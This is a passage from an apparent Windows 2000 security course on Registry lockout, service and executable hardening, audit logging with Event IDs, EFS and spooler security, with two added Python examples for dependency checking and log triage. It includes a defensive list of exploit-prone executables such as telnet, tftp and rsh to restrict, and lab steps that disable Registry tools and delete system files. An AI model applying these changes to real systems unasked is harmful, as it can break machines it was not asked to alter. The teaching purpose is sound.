If students are unable to re-enable local Registry access, their ability to complete future tasks will be severely affected. You might want to have them back up the entire Registry to a safe place prior to performing this task, or you can skip the task altogether. To ensure that you will be able to troubleshoot this task, make sure that at least one machine in the classroom setup always has the Registry tools enabled.

1. Open Regedit, and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies.
2. Right-click Policies, and add a new key called System.
3. In the right pane, right-click and add a new DWORD value named DisableRegistryTools.
4. Provide a REG_DWORD value of 1. A value of 0 would allow Registry Editing Tools.
5. Close the Registry Editor.
6. Attempt to access the Registry with either Regedit or Regedt32. You should not be able to open the Registry Editor. To recover this ability, you will need to access the Registry remotely from another computer.
7. Create a share of your \WINNT\System32 folder. Allow your remote administration (scnpxxxb) account Full Control, and remove all other permissions for all other users and groups.
8. Switch computers with your neighbor, and access the Registry on your computer. Choose Registry > Connect Network Registry, enter your IP address, and click OK.
9. Expand HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
10. Set DisableRegistryTools to 0 so that you will again be able to edit the Registry from the local machine.
11. Return to your own computer, and verify that you can open the Registry tools. Notify your instructor if you have trouble completing this step.

Be prepared to troubleshoot. All students must be able to access Registry tools before proceeding to the next activity.

12. Close all open windows.

System Hardening

Now that you have seen how to secure resources, including access to the Registry, it is time to secure the base operating system itself. This includes removal of unneeded services, setting security permissions on common executables, disabling unused subsystems, and keeping updated on Service Packs and Hotfixes.

Disabling Services

On the vast majority of Windows installations, the services that are loaded and running by default are not needed, nor will they be used in secure environments. Many of the services are installed with the OS, and others will be added as applications are added to the system.

Figure 4-10: Services that can be managed on a Windows 2000 computer.

Services can be one of three Startup types: Manual, Automatic, and Disabled. Manual Startup implies that you will configure the service upon need, but it will not start when the system is initialized. The Automatic setting will execute the startup configuration when the system starts.

A nice feature in Windows 2000 is the ability to find out what other services are required for a given service to run. These are known as dependencies. For example, in order for the Messenger service to run properly, both the Remote Procedure Call (RPC) and the Workstation service must be running.
Disabled means that the service will not execute until you manually reconfigure it to be an active service.

Figure 4-11: Example of service dependencies in Windows 2000.

Securing Common Executables

In hardening the OS, an often-overlooked option is to harden the actual programs that are often used in exploits. You can increase the security of the system by placing permissions on these applications.

For the applications listed here, you might want to create a new group for individuals who require access, not including the Administrators group or the System (sometimes called LocalSystem on a standalone server) account. Then, provide the desired level of permissions on the executables. Be aware that altering the permissions on these can affect applications, so you can adjust as needed if the situation arises. Add to or remove from this list for your unique configuration:

arp.exe
at.exe
attrib.exe
cacls.exe
cmd.exe
command.com
debug.exe
dialer.exe
edit.com
finger.exe
ftp.exe
ipconfig.exe
nbtstat.exe
net.exe
netstat.exe
nslookup.exe
ping.exe
rcp.exe
rdisk.exe
regedit.exe
regedt32.exe
rexec.exe
route.exe
rsh.exe
runonce.exe
sysedit.exe
telnet.exe
tftp.exe
tracert.exe
xcopy.exe

Disabling Subsystems

In Windows 2000, there are several subsystems that are loaded with the installation of the operating system. These subsystems can provide the environments needed for running software. For example, there is a subsystem for OS/2 applications. You might want to remove the subsystems that you will not be using. To do this requires two steps:

1. Edit the Registry to remove references to the subsystems that you want to disable.
2. Remove the actual files required for the subsystem.
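Before setting a service to Disabled, the dependency information described under Disabling Services above lets you check which other services would stop with it. The following added example (not the course's own code) computes that from a small dependency table; the table is constructed around the Messenger, RPC and Workstation relationship the text gives, and its other entries are assumptions for demonstration, not a statement of the Windows 2000 defaults:

```python
"""Find the services that break when a given service is disabled.

Added example, not part of the course. REQUIRES maps a service to the
services it depends on, as its Dependencies tab would show; only the
Messenger entry comes from the text, the rest are constructed.
"""
from collections import deque

REQUIRES = {
    "Messenger": {"Remote Procedure Call (RPC)", "Workstation"},  # from the text
    "Alerter": {"Workstation"},                                     # assumed
    "Computer Browser": {"Server", "Workstation"},                  # assumed
    "Telnet": {"Remote Procedure Call (RPC)"},                      # assumed
    "Workstation": set(),
    "Server": set(),
    "Remote Procedure Call (RPC)": set(),
}


def reverse_dependencies(requires):
    """Invert the table: service -> services that directly depend on it."""
    dependants = {name: set() for name in requires}
    for name, needs in requires.items():
        for dep in needs:
            dependants.setdefault(dep, set()).add(name)
    return dependants


def affected_by_disabling(service, requires):
    """Every service that, directly or transitively, needs `service` running."""
    dependants = reverse_dependencies(requires)
    seen, queue = set(), deque([service])
    while queue:
        current = queue.popleft()
        for name in dependants.get(current, ()):
            if name not in seen:
                seen.add(name)
                queue.append(name)
    return sorted(seen)


def safe_to_disable(candidates, must_keep, requires):
    """Candidates whose removal leaves every service in `must_keep` runnable."""
    must_keep = set(must_keep)
    return [s for s in candidates
            if not must_keep & set(affected_by_disabling(s, requires))]


if __name__ == "__main__":
    print(affected_by_disabling("Workstation", REQUIRES))
    # A host that must keep browsing and Telnet: only Messenger is safe to drop.
    print(safe_to_disable(["Messenger", "Workstation", "Remote Procedure Call (RPC)"],
                          {"Computer Browser", "Telnet"}, REQUIRES))
```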

TASK 4D-5
Removing Unneeded Subsystems

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and local Registry editing has been re-enabled.

1. Navigate to \WINNT\System32 and delete the files posix.exe, psxss.exe, os2.exe, os2srv.exe, and os2ss.exe.
2. Open the Registry Editor.
3. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems.
4. In this subkey, delete the entries for Posix and Os2.
5. Close the Registry Editor.

Topic 4E
Windows 2000 Auditing and Logging

In Windows 2000, logging can be very complete, enough so that the average administrator can easily become frustrated sorting the volumes of information that have been recorded. The volumes of information that are collected are viewed in the Event Viewer tool. The Event Viewer offers three primary logs: the Application Log, the Security Log, and the System Log. In this topic, you will be focused on the Security Log.

Although Windows 2000 automatically tracks and records events in the Application and System Logs, Security Logging must be turned on in order to view any Security Log events. To turn on Security Logging, you must create an Audit Policy.

Configuring the Audit Policy will allow you to have more granular control over the specific events that are recorded into the logs. For example, you might want to log just attempts at logging on and off the system, or only changes to policy options. The following list identifies each policy option and provides a short description of the settings:

Audit Account Logon Events: This setting will log user account logon events. This can include events like Kerberos ticket information and accounts used for logon.
Audit Account Management: This setting logs changes to, creation of, and deletion of a user account or group. This setting can additionally log renaming, disabling, enabling, and password changes for a user account.
Audit Directory Service Access: This setting logs access to an Active Directory object by a user. In order for this log to function, the object needs to be configured for auditing.
Audit Logon Events: This setting logs users logging on and off, and logs network connection terminations.
Audit Object Access: This setting logs access to a file, folder, or printer. In order for this log to function, the object needs to be configured for auditing.
Audit Policy Change: This setting will log any changes to the audit policies, user rights, or user security settings.
Audit Privilege Use: This setting will log use of a privilege by a user account.
Audit Process Tracking: This setting will log applications executing processes in the system.
Audit System Events: This setting will log system events, such as the shutdown or restart of the computer.

Figure 4-12: Audit Policy settings of the Local Computer policy.

In order for the policy to take effect, you have several options. One is to wait until the policy propagates at the regular interval, which can be configured by the administrator. Another option is to run the command secedit /refreshpolicy machine_policy at the command prompt.

Object Auditing

To audit access to specific objects such as files, folders, and printers, you will need to perform configuration on the object itself, in addition to the creation of the Audit Policy. The auditing section of the object is located on the Security tab of the Properties for the object. Click the Advanced button, and select the Auditing tab.

The object you want to audit must be on an NTFS partition.

An example of security-related auditing, other than a normal file-access log, is to track access to the System32 folder of the OS. As a critical folder, it can provide relevant security information to see which users are accessing the contents of this folder, and when they are accessing it.

Active Directory Auditing

Just as you can log access to an object like a file or a folder, you can log access to an Active Directory object. The first thing you need to do is to enable the auditing of Active Directory objects in your Audit Policy. Then, select the specific objects that you want to audit.

TASK 4E-1
Enabling Auditing

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. From Administrative Tools, open the Local Security Policy.
2. Expand Local Policies, and select Audit Policy.
3. Double-click Audit Account Logon Events.
4. Check both Success and Failure, and click OK.
5. Double-click Audit Logon Events.
6. Check both Success and Failure, and click OK.
7. Close the Local Security Policy.
8. Open a command prompt, and enter secedit /refreshpolicy machine_policy to force the policy to refresh now.
9. Open the Local Security Policy, and verify that the new settings have taken effect.
10. Close the Local Security Policy.

Registry Auditing

Auditing the Registry can provide critical information in securing the network, and can also provide important data in troubleshooting an event. This is similar to the process required for auditing other events, in that you choose the object, and then configure the auditing on the object. Remember that in order to configure auditing of the Registry, you will need to use Regedt32, not Regedit. When you do configure audits by using Regedt32, be aware that the objects you audit will be tracked even if an access is made using Regedit.

The options available in auditing the Registry are a bit different than in auditing a file or folder. There are permissions such as Query Value or Set Value. The list of accesses that can be audited is shown in Figure 4-13. Some of the auditing options are detailed as follows:

Query Value: Audit the user or group reading the object.
Set Value: Audit the user or group writing to the object.
Create Subkey: Audit the user or group creating a key.
Enumerate Subkeys: Audit the user or group enumerating a list of keys in the object.

These options can be configured for either success or failure. So, if you want to know who has failed in their attempt to read the SAM, you would select the group and audit Query Value failures.

Figure 4-13: Options for auditing the SAM in the Registry.

TASK 4E-2
Logging SAM Registry Access

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Create a regular user account called Ordinary, and assign Ord1n8ry? as the password. Remember to uncheck User Must Change Password On Logon before clicking Create.
2. Allow the Ordinary user account the right to Log On Locally.
3. Open Regedt32.
4. Navigate to HKEY_LOCAL_MACHINE\SAM.
5. Choose Security > Permissions.
6. Click the Advanced button.
7. Select the Auditing tab.
8. Add the user account Ordinary.
9. For Query Value, check both Successful and Failed, and click OK.
10. Click OK to close the SAM Access Control Settings.
11. Click OK to close the SAM Permissions, and close Regedt32.
12. Log off as the renamed Administrator account, and log on as Ordinary. If you are prompted to save the changes to the console, click No.
13. Open a Registry Editor, and attempt to open the SAM subkey. You should receive an error message. Click OK to clear the message.
14. Close the Registry Editor, and log off.
15. Log back on as the renamed Administrator account. You will examine the Event Viewer logs shortly.

Managing the Event Viewer

In the Event Viewer, you will perform your primary functions in reading and managing the logs of the system. You can also use software to manage the logs and to send the logs to a database for viewing, but at this point, you will work directly in the Event Viewer. The Event Viewer provides the three logs: Application, System, and Security. In the Event Viewer logs, there are five types of events that can be reported. They are Error, Warning, Information, Success Audit, and Failure Audit. You can add components to Event Viewer, based on the applications installed, such as DNS, as shown in Figure 4-14. The logs are listed in the Viewer with the most current event being the highest on the list. You might need to go up and down the list to follow a sequence of events. You can also sort the columns by clicking any column name.

Figure 4-14: An example of the Event Viewer with a Failure Audit.

The objects that you choose to log will provide three primary sources of information to you:

The action that was performed.
The user account that performed the action.
The success or failure of the event.

You will also be able to learn information such as the time of the event, names of computers involved, IP addresses of computers involved, and more. In Figure 4-15, you can see an event with the following information:

The date and time of the event.
The user account that triggered the event.
That the event was a failure.
The name of the computer where the event happened.
The name of the object that was audited.

Figure 4-15: A failed attempt at accessing a Registry key, logged in Event Viewer.

From this single detailed log, you are able to say that user account Ordinary, on the computer named INS-W2K-01, at 19:32, on 11/21/2002, tried and failed to access the SAM subkey of the Registry.

TASK 4E-3
Viewing the Registry Audit

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Event Viewer.
2. Open the Security Log.
3. Locate the Failure Event for your attempted Registry access. If for some reason your Failure Event does not display, review the preceding Concepts section to view an example of one.
4. Compare what you can identify from your log to the previous example. You should be able to identify:
   a. User Account
   b. Date
   c. Time
   d. Success or Failure
   e. Computer Name
   f. Object Accessed
5. Once you have identified these items, close the Event Viewer.

Event IDs

Although at this stage mentioning that you have a series of 529 events, all one minute apart, may not mean anything, you should be comfortable with the primary Event IDs, so that you can quickly be aware of what is happening on the system.

The following table lists common security-related Event IDs. You should become comfortable with these IDs, as you will see them often in your work as a security professional.

Event ID   Description
512        Successful starting of the operating system.
513        Successful shutting down of the operating system.
517        Successful clearing of the Audit Log.
528        Successful logon.
529        Failure of a logon due to unknown username or bad password.
530        Failure of a logon due to account logon-time restrictions.
531        Failure of a logon due to the account being disabled.
540        Successful network logon.
624        Successful creation of a new user account.
626        Successful enabling of a user account.
628        Successful change of a user account's password.
629        Successful disabling of a user account.
644        Successful locking out of a user account.
645        Successful creation of a new computer account.

You can find complete descriptions of Event IDs online in many locations, and from Microsoft at http://support.microsoft.com.

Authentication Logging

In order to bring the overall options in logging down to a smaller subject, you will focus here just on the Authentication process. Windows 2000 can provide extensive logs on all successes and failures of the logon process. This will assist you greatly when investigating security issues and troubleshooting account access. The following table lists Event IDs that are all directly related to the Authentication process in Windows 2000, and are enabled by choosing Success and Failure of Logon Events in the Audit Policy.

Event ID   Description
528        A successful logon.
529        A failed logon due to unknown user name or bad password.
530        A failed logon due to account logon-time restrictions.
531        A failed logon due to the account being currently disabled.
532        A failed logon due to the account being expired.
533        A failed logon due to the account not being allowed to log on at the computer.
534        A failed logon due to the account not being granted the logon type requested at the computer, such as interactive or network.
535        A failed logon due to the account's password being expired.
536        A failed logon due to NetLogon not being active.
537        A failed logon due to an unexpected error during the logon attempt.
538        A successful logoff of an account.
539        A failed logon due to the account being locked out.
540        A successful network logon.

When you go to examine the details of the Authentication Log, you will find that Logon Type is an entry in the log. There are six different Logon Types:

Logon Type 2: Interactive
Logon Type 3: Network
Logon Type 4: Batch
Logon Type 5: Service
Logon Type 6: Proxy
Logon Type 7: Unlock the Workstation

Numbers 0 and 1 are not valid Logon Types.

proxy: A firewall mechanism that replaces the IP address of a host on the internal (protected) network with its own IP address for all traffic passing through it. A software agent that acts on behalf of a user; typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps do additional authentication, and then complete a connection on behalf of the user to a remote destination.

In addition to the Logon Type that you will find in the log, you will find an entry called the Logon Process. There are seven different Logon Processes, and they are more technical in their description than the previous fields. The Logon Processes are as follows:

NtLmSsp or MICROSOFT_AUTHENTICATION_PACKAGE_V1_0: msv1_0.dll, the default authentication package
KSecDD: ksecdd.sys, the security device driver
User32 or WinLogon\MSGina: winlogon.exe and msgina.dll, the authentication user interface
SCMgr: The Service Control Manager
LAN Manager Workstation Service
advapi: API call to LogonUser
MS.RADIU: The RADIUS authentication package; a part of the Microsoft Internet Authentication Services (IAS)

Frequently, administrators will use only the Logon Events as described previously. You can add Account Logon Events to your Audit Policy. If you do add this option for Success and Failure, you will see the Event IDs reported, as shown in the following table.

Event ID   Description
672        Successful authentication ticket granted.
673        Successful service ticket granted.
674        Successful ticket granted renewed.
675        Failure of Pre-Authentication.
676        Failure of the authentication ticket request.
677        Failure of the service ticket request.
678        Successful account mapped for logon.
679        Failure of the account being mapped for logon.
680        Successful account used for logon.
681        The logon to account <CLIENT NAME> by <SOURCE> from workstation computername failed. The Error Code was ErrorCode.
682        Successful session reconnected to Winstation.
683        Successful session disconnection from Winstation.

Note that for Event ID 681, there is a field called ErrorCode. The error codes provide an even higher level of detail on the specifics of an event. The following table defines each Error Code and provides a description of the reason for the logon failure.

Error Code   Description
3221225572   The username provided does not exist.
3221225578   The username provided is correct, but the password is incorrect.
3221226036   The user account is locked out.
3221225586   The user account is disabled.
3221225583   The user account attempted to log on outside the user account's allowed logon hours.
3221225584   The user account attempted to log on from a workstation the account did not have the right to log on from.
3221225875   The user account has expired.
3221225585   The user account attempted to log on using an expired password.
3221226020   The user attempted to log on with a user account where the Administrator has defined the User Must Change Password At Next Logon option.

TASK 4E-4
Creating Events

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Event Viewer.
2. Right-click the Security Log and choose Clear All Events.
3. When you are prompted to save the log, click No.
4. Close the Event Viewer.
5. Create a user account using your first name, and f1R5+n@m3 as the password.
6. Grant the new user account the right to log on locally.

7. Lock the computer, while logged on as the renamed Administrator account.

To lock the computer, press Ctrl+Alt+Delete, and then click Lock Computer.

8. Unlock the computer, using the renamed Administrator credentials.
9. Log off the renamed Administrator account.
10. Log on as your newest user account (the one with your first name), using the wrong password. This should fail.
11. Log on as your newest user account, using the correct password. This should be successful.
12. Attempt to connect to another computer in the network. This should fail, as user accounts for other students were not created on your computer, and vice versa.
13. Attempt to connect to another computer in the network as a remote Administrator account with the correct password. This should be successful.
14. Close the network connection, and log off your user account.
15. Log back on as your renamed Administrator account.

Viewing Event Logs

Now that you have created a group of events to analyze, you will run through this process. Try to follow the sequence of events as you triggered them. Watch for the local and network differences in the logs and identify the Event IDs for quick analysis.

TASK 4E-5
Viewing Event Logs

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Event Viewer.
2. Open the Security Log and examine the log. You should be able to identify at least one of each of the following:
   a. A successful local logon.
   b. A successful unlocking of the computer.
   c. A successful network logon.
   d. A failed local logon attempt.
   e. A failed network logon attempt.
3. Identify the Event IDs, Logon Types, and the Error Codes where they apply.
4. Close the Event Viewer.

Once you become more comfortable with Event IDs, you will be aware that a series of 529 events can be an indication of a possible attack. However, with all of the events that can happen and all of the data that can be collected, the process of simply viewing and managing the log les can become tedious, and even overwhelming. There are features built in to the Event Viewer that are designed to help you work with the volumes of data that are collected. In addition to the features of Event Viewer, there are third-party applications that are designed to manage the logs. These applications lter specic events, group them for simplicity, and can notify you in case a dened sequence of events happens.
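The two checks this topic asks for, decoding the Error Code of a 681 event and noticing a run of 529 events against one account, can be scripted once the Security Log has been saved in CSV form. The following Python is an added example and is not part of the course material. It assumes a simplified export layout (columns date, time, event_id, user, computer, description) rather than the exact Event Viewer *.csv columns, and the log lines embedded in it are constructed for the demonstration.

```python
"""Security-log triage: decode Event ID 681 error codes and flag a series of
529 (failed logon) events for one account.

Added example, not code from the course. It assumes a simplified CSV export
with the columns date,time,event_id,user,computer,description; a real Event
Viewer *.csv has a different column layout, so adjust the field names."""
import csv
import io
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Decimal NTSTATUS values from the Event 681 table above, with hex forms.
LOGON_FAILURE_REASONS = {
    3221225572: ("0xC0000064", "user name does not exist"),
    3221225578: ("0xC000006A", "user name correct, password incorrect"),
    3221226036: ("0xC0000234", "account locked out"),
    3221225586: ("0xC0000072", "account disabled"),
    3221225583: ("0xC000006F", "logon outside allowed logon hours"),
    3221225584: ("0xC0000070", "logon from a workstation not permitted for the account"),
    3221225875: ("0xC0000193", "account expired"),
    3221225585: ("0xC0000071", "password expired"),
    3221226020: ("0xC0000224", "user must change password at next logon"),
}

def describe_error_code(code):
    """'hex: reason' for a 681 error code; unknown codes are shown in hex."""
    hexval, reason = LOGON_FAILURE_REASONS.get(code, (hex(code), "unknown error code"))
    return f"{hexval}: {reason}"

_LOGON_TYPE = re.compile(r"Logon Type:\s*(\d+)")
_ERROR_CODE = re.compile(r"error code was:\s*(\d+)")

def parse_events(csv_text):
    """Turn the export into dicts with typed fields. logon_type comes from
    528/529/540 descriptions, error_code from 681 descriptions; None if absent."""
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        lt = _LOGON_TYPE.search(row["description"])
        ec = _ERROR_CODE.search(row["description"])
        events.append({
            "time": datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S"),
            "event_id": int(row["event_id"]),
            "user": row["user"],
            "computer": row["computer"],
            "logon_type": int(lt.group(1)) if lt else None,
            "error_code": int(ec.group(1)) if ec else None,
        })
    return events

def find_529_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """{user: (count, first, last)} for accounts with >= threshold failed logons
    inside any sliding window; the densest window per account is reported."""
    failures = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 529:
            failures[ev["user"]].append(ev["time"])
    bursts = {}
    for user, times in failures.items():
        times.sort()
        best, start = None, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # shrink window from the left
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, times[start], times[end])
        if best:
            bursts[user] = best
    return bursts

def explain_681s(events):
    """(user, computer, explanation) for every 681 that carries an error code."""
    return [(ev["user"], ev["computer"], describe_error_code(ev["error_code"]))
            for ev in events if ev["event_id"] == 681 and ev["error_code"] is not None]

# Constructed sample export: alice is guessed at from WS2 six times in three
# minutes and then locked out; bob mistypes once. Not a real log.
SAMPLE_EXPORT = """date,time,event_id,user,computer,description
2003-05-12,09:00:01,528,admin,WS1,Successful Logon: User Name: admin Logon Type: 2
2003-05-12,09:01:10,529,alice,WS1,Logon Failure: Reason: Unknown user name or bad password User Name: alice Logon Type: 3 Workstation Name: WS2
2003-05-12,09:01:40,529,alice,WS1,Logon Failure: Reason: Unknown user name or bad password User Name: alice Logon Type: 3 Workstation Name: WS2
2003-05-12,09:02:05,529,alice,WS1,Logon Failure: Reason: Unknown user name or bad password User Name: alice Logon Type: 3 Workstation Name: WS2
2003-05-12,09:02:30,529,bob,WS1,Logon Failure: Reason: Unknown user name or bad password User Name: bob Logon Type: 2 Workstation Name: WS1
2003-05-12,09:02:55,529,alice,WS1,Logon Failure: Reason: Unknown user name or bad password User Name: alice Logon Type: 3 Workstation Name: WS2
2003-05-12,09:03:20,529,alice,WS1,Logon Failure: Reason: Unknown user name or bad password User Name: alice Logon Type: 3 Workstation Name: WS2
2003-05-12,09:03:50,529,alice,WS1,Logon Failure: Reason: Unknown user name or bad password User Name: alice Logon Type: 3 Workstation Name: WS2
2003-05-12,09:03:50,681,alice,WS1,The logon to account: alice by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 from workstation: WS2 failed. The error code was: 3221226036
"""

if __name__ == "__main__":
    evs = parse_events(SAMPLE_EXPORT)
    for user, (count, first, last) in find_529_bursts(evs).items():
        print(f"{user}: {count} failed logons between {first:%H:%M:%S} and {last:%H:%M:%S}")
    for user, computer, why in explain_681s(evs):
        print(f"681 for {user} on {computer}: {why}")
```

The sliding window matters more than the raw count: six failures in three minutes from one workstation is a guessing attempt, six over a month is a user who forgets the password on Mondays. Tune threshold and window to the lockout policy in force, since a burst that trips the lockout also produces the 681 with error code 3221226036 seen in the sample.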

Event Viewer Features

One of the most straightforward features in the Event Viewer is the Search function. For example, you might be looking for all of the 529 events after a new password policy has been implemented. You need to determine the number of bad logons in comparison to before the policy was put in place. Or, you may suspect that a user account is being attacked and want to search only for 529 events that are related to a certain user account.

To find any of these, you will use the View→Find command. With this command, you can search for events by using fields, including Event Source, Event ID, User, Computer, Success, Failure, Information, Warning, and Error.

In addition to the Find function, you can use the View→Filter command. The Filter Events function enables you to select specific criteria, apply the filter, and view only the events that are relevant to your filter. For example, if you are still under the impression that an account is being attacked, you can select that account as the filter, and view all instances of that account in the Security Log.

When you apply a filter, the full log data is not altered, only the presentation of the data on screen. You have the same options for filtering as were available to you when searching. In addition to the fields that are available with the Find command, you will also have the option to define events from and to a specific date and time.

Finally, a very direct feature in the Event Viewer is the sorting option. Just as in other Windows applications, you can sort by any of the columns in the Event Viewer to group events, such as by time or by Event ID. By default, the Event Viewer displays events with the most recent event on the top of the list.

Managing Log Files

If you will need to store the logs for later reading or analysis, there is also an option to save the log. You can save the log as either an Event Log file (*.evt), a text file (*.txt), or a CSV (Comma Separated Value or Comma Delimited) file (*.csv). You can then open these files later in Event Viewer or in a database or other reading application. Only the *.evt format preserves the complete event record, including the binary data field, so keep the *.evt copy if the log may be needed as evidence and treat the text and CSV exports as working copies.

Third-party Applications

As functional as the built-in features of the Event Viewer are, for many people they do not provide enough control or options. To address that need, there are several third-party applications that work for managing the Event Logs. One of these programs is the Event Log Sentry, by Engagent, whose Web site is www.engagent.com. This tool enables you to manage the logs of several computers from a single location. By using this tool, you can monitor events in real time and have the software contact you or trigger an automated response to the events. This tool crosses the line from simply viewing the Event Logs into the realm of Intrusion Detection Systems (IDS). IDS is beyond the scope of this course and will be fully covered, along with the Event Log Sentry tool, in the Network Defense and Countermeasures course.

intrusion detection: Pertaining to techniques which attempt to detect intrusion into a computer or network by observation of actions, security logs, or audit data. Detection of break-ins or attempts either manually or via software expert systems that operate on logs or other information available.

Topic 4F
Windows 2000 EFS

One of the significant benefits to using personal computers is that you have the ability to boot into multiple operating systems for whatever use you feel is appropriate. Although this presents great convenience and benefit to the users of computers, it presents great difficulty in the world of security, especially in the corporate environment.

In addition to the security risks of multiple operating systems, there are complex security risks introduced with the use of laptop computers. Laptops often get stolen or misplaced, and the data on the laptop computer is vulnerable to compromise as soon as the location of the computer is unknown (unknown to the owner, that is).

By using NTFS security, you are able to combat these issues to a certain extent. As demonstrated, however, there are tools available to access even properly secured data on an NTFS partition once an attacker can boot another operating system against the disk.

EFS

To solve this issue, we now introduce the concept of data encryption. Not a new idea, data encryption works to make the files on the computer useful only to the proper owner of the data. Some of these systems would work by providing a password for each encrypted file, which, while effective, is not practical for large volumes of files. Another method of using encryption is to use a key to unlock each file that has been encrypted, with only one user holding the key. This is the approach that Microsoft's Encrypting File System (EFS) takes to data encryption. EFS uses what is known as public key cryptography, the details of which are beyond the scope of this course. In general, however, public key cryptography is the use of two keys: one that performs encryption and another that performs decryption. The keys are linked by a mathematical formula. Each file that EFS encrypts is protected by its own randomly generated symmetric key (described under EFS Cryptography below); the user's public key pair is used only to protect that per-file key, not to encrypt the file contents directly.

The implementation of EFS works directly with NTFS. Data can be encrypted only on NTFS partitions. EFS is designed to encrypt any temporary files created along with the originals, and the keys are stored in the kernel using nonpaged memory, so they are never vulnerable to an attacker searching the pagefile of the system.

EFS and Users

One of the things that can be a good or bad issue of EFS is that users can use it with no administrative effort. The EFS subsystem automatically creates the required keys, if the user does not already have a public key pair to use. Files and folders that are marked for encryption are encrypted on a per-file or per-folder basis, each file with a unique encryption key. Because they are encrypted uniquely, if you move an encrypted file to an unencrypted folder on the same partition, the file will remain encrypted. If you copy an encrypted file to a location that allows for encryption, the file will remain encrypted. Copying it to a location that does not support encryption, such as a FAT partition or a floppy disk, produces a cleartext copy, which is the case to watch for.

The use of EFS is designed to be transparent to the user. This means that a user may have encryption enabled and not be aware of it. As long as things go smoothly, this is not an issue. In the event things do not go smoothly, there are methods for recovery.

Data Recovery

Obviously, if EFS can be implemented by a user, and is designed to be transparent, it can be used where it was not intended. EFS allows for what are known as Recovery Agents. The default Recovery Agent is the Administrator. These agents have configured public keys that are used to enable file recovery. The system is designed so that only the file recovery is possible; the Recovery Agent cannot learn about the user's private key.

Data Recovery is designed for those companies and organizations who have the requirement of accessing data if an employee leaves or if the encryption key is lost. The policy for how Data Recovery will be implemented is defined at a Domain Controller and will be enforced on every computer in that domain. If EFS is implemented on a machine that is not part of a domain, the system will automatically generate and save Recovery Keys for the local Administrator account. That means the recovery key lives on the same disk as the encrypted data unless you export it and remove it from the machine, which is the recommended practice for a laptop.

EFS Cryptography

As mentioned, EFS uses public key cryptography together with a symmetric algorithm. In Windows 2000 the default symmetric algorithm is DESX, a strengthened variant of DES; with Service Pack 1 and the High Encryption Pack, or with Service Pack 2 or greater, 3DES can be used instead. Data is encrypted by what is called a File Encryption Key (FEK). This FEK is a randomly generated key of the length required by the algorithm.

The FEK itself is then encrypted by using the user's public key, which creates a list of encrypted FEKs, one per user who has access to the file. The list is stored with the encrypted file in a special attribute called the Data Decryption Field (DDF). A second list, encrypted with the public keys of the Recovery Agents, is stored in the Data Recovery Field (DRF). When a user needs to decrypt the file, he or she will use the private key that was part of the key pair to recover the FEK, and the FEK then decrypts the file contents.

EFS supports file encryption both on a local hard drive and on a remote file server. However, it is very important to note that any files that are encrypted on the remote server will be transmitted over the network in cleartext by default. This is because the file is decrypted at the file server and then sent to the user. In order to maintain a high level of security, there must be a mechanism in place to secure the network traffic, such as IPSec, which you worked with earlier in the course.

You can perform encryption from the command line or from within Explorer. When you are using Explorer, the option to encrypt is on the Advanced tab of the General Properties window. When you are using the command line, the command is cipher, with an /e switch for encryption and a /d switch for decryption. Run without switches, cipher lists the encryption state of the files in the current directory, which is a quick way to verify that a file really is encrypted.

TASK 4F-1
Encrypting Files

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. At the root of the NTFS partition, create a text document called Mine.txt, and place some text in it.
2. Open Explorer, and display the properties of the Mine.txt file.
3. Click Advanced, check Encrypt Contents To Secure Data, and click OK twice.
4. Observe the Explorer window to verify that the E attribute is now set.
5. Close all open windows.
Topic 4G
Securing Network Communications

Windows 2000 Network Security

In this topic, you will examine the effects of turning on/off the NetBIOS protocol on a Windows 2000 machine. NetBIOS stands for Network Basic Input Output System, and is an API that allows for naming and addressing of devices on a network, regardless of the underlying transport, such as IP or IPX. The relationship to file sharing is the reverse of what is often assumed: NetBIOS does not rely on SMB; rather, SMB file and print sharing traditionally rides on top of NetBIOS (NetBIOS over TCP/IP, or NetBT, on TCP port 139). Windows 2000 can also carry SMB directly over TCP on port 445, which is what makes the NetBIOS-less communication in the later task possible.

About the Tasks

For the following tasks, students should work in pairs. The tasks refer to the machines as Student_P and Student_Q. These pairs of machines will participate in a file- and printer-sharing exercise, where all the computers designated as Student_P are Windows clients and the computers designated as Student_Q are file and print servers. Also, while on the subject of print shares, you will address the issue of spooler file insecurity that was discussed earlier. You will take a look at the contents of a spooled file. You will also capture information being sent to a network printer and view the contents of this capture. What you will realize pretty soon is that information that is classified should be sent only to print servers that are classified. The printers should also be physically secure. Folders that hold spooled files should be secure. It goes without saying, then, that network traffic should be secure.

TASK 4G-1
Investigating Printer Spooler Security

Setup: You are logged on to Windows 2000 as the renamed Administrator account. If you have been designated as Student_P, you will act as a Windows client; if you have been designated as Student_Q, you will act as a Windows file and print server.

Note: Perform step 1 through step 18 only if you are designated as Student_Q.

1. In your boot partition, create a folder named Share.
2. Right-click this folder, and choose Sharing.
3. Click Share This Folder, leave the default share name as Share, and click OK.
4. From the Start menu, choose Settings→Printers.
5. Double-click Add Printer.
6. Click Next.
7. Verify that Local Printer is selected. Uncheck Automatically Detect And Install My Plug And Play Printer. Click Next.
8. Verify that Use The Following Port is selected, leave it at the default port (LPT1:), and click Next.
9. Select any printer from the list, and click Next.
10. Shorten the printer name to the first four letters, and click Next.
11. Allow the printer to be shared, leave the share name as whatever is displayed, and click Next twice.
12. When you are prompted to print a test page, click No, and then click Next and click Finish.
13. Select the printer, and choose File→Server Properties.
